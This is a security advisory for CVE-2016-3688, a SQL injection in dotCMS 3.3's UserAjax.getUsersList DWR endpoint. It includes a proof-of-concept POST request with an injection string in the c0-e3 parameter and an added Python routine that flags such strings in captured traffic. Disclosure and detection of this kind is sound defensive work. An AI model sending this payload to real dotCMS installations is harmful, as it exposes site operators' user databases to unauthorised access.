
DotCMS 3.3 SQL Injection

Posted Apr 5, 2016
Authored by Piaox Xiong

DotCMS version 3.3 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2016-3688
SHA-256 | faa63524a8d16e4af5a5bf5641da111cadd20a585bd8aee91ab2604c4c1d63e8

1. Description

Exploit Title: SQL Injection Vulnerability in DotCms v3.3

Date: 3-28-2016

Vendor Homepage: http://dotcms.com/

Vendor: dotcms

Software: Content Management System

Version: v3.3

CVE: CVE-2016-3688





2. Product Summary

================

dotCMS is a fully featured, open source, enterprise-grade J2EE/Java-based web content management system for building and managing websites, content, and content-driven web applications. It is specially designed to bridge the gap between PHP CMS and J2EE document management solutions. It includes features such as support for virtual hosting, WebDAV (beta), structured content, and clustering, and can run on multiple databases: PostgreSQL, MySQL, MSSQL and Oracle. It also includes standard WCMS features like page caching, templating, and an API.



3. Vulnerabilities

================

A SQL injection vulnerability has been identified in dotCMS 3.3 which, if successfully exploited, could allow an attacker to access sensitive information in the dotcms database.

Demo: http://dotcms.com/content-management-system/cms-demo



The vulnerability is in the "c0-e3" parameter of dwr/call/plaincall/UserAjax.getUsersList.dwr.



Proof of concept

================

POST /dwr/call/plaincall/UserAjax.getUsersList.dwr

callCount=1

windowName=c0-param2

c0-scriptName=UserAjax

c0-methodName=getUsersList

c0-id=0

c0-param0=null:null

c0-param1=null:null

c0-e1=number:0

c0-e2=number:50

c0-e3=string:%25'%20and%201%3D1%20and%20'%25'%3D'

c0-param2=Object_Object:{start:reference:c0-e1, limit:reference:c0-e2, query:reference:c0-e3}

batchId=4

instanceId=0

page=%2Fc%2Fportal%2Flayout%3Fp_l_id%3Da8e430e3-8010-40cf-ade1-5978e61241a8%26p_p_id%3DEXT_USER_ADMIN%26p_p_action%3D0%26%26dm_rlout%3D1%26r%3D1459154302419

scriptSessionId=jnMOli*Civ5bu2PIg2Z1YaOlYel/10irYel-hmv1Q$Yud
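
Added example (not part of the original advisory): a Python check a defender could run over captured request bodies for this endpoint. It parses the DWR plaincall body, follows the query reference from c0-param2 as laid out in the proof of concept, and flags SQL metacharacters in the decoded filter. The function names, the metacharacter pattern and the benign sample body are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample bodies in the DWR plaincall layout shown in the proof of concept.
BENIGN = "\n".join([
    "callCount=1",
    "c0-scriptName=UserAjax",
    "c0-methodName=getUsersList",
    "c0-e1=number:0",
    "c0-e2=number:50",
    "c0-e3=string:admin",
    "c0-param2=Object_Object:{start:reference:c0-e1, limit:reference:c0-e2, query:reference:c0-e3}",
])
FLAGGED = BENIGN.replace("string:admin", "string:%25'%20and%201%3D1%20and%20'%25'%3D'")

# Assumed heuristic: characters a user-search filter should rarely need.
SUSPICIOUS = re.compile(r"'|\"|--|/\*|;")

def parse_dwr_body(body):
    """Split a newline-delimited DWR plaincall body into a key -> value dict."""
    fields = {}
    for line in body.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep:
            fields[key] = value
    return fields

def resolve_member(fields, param, member):
    """Follow 'member:reference:<key>' inside an Object_Object parameter."""
    match = re.search(r"\b%s:reference:([\w-]+)" % re.escape(member), fields.get(param, ""))
    if not match:
        return None
    dtype, _, raw = fields.get(match.group(1), "").partition(":")
    # Only string values reach the search filter; URL-decode before inspecting.
    return unquote(raw) if dtype == "string" else None

def inspect_request(body):
    """Return the decoded query filter if it looks like SQL syntax, else None."""
    fields = parse_dwr_body(body)
    if (fields.get("c0-scriptName"), fields.get("c0-methodName")) != ("UserAjax", "getUsersList"):
        return None
    query = resolve_member(fields, "c0-param2", "query")
    if query is not None and SUSPICIOUS.search(query):
        return query
    return None
```

A hit is a prompt for review rather than proof of an attack, since a legitimate name search can contain an apostrophe.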






4. Discovered by

================
piaox xiong - xiongyaofu351@pingan.com.cn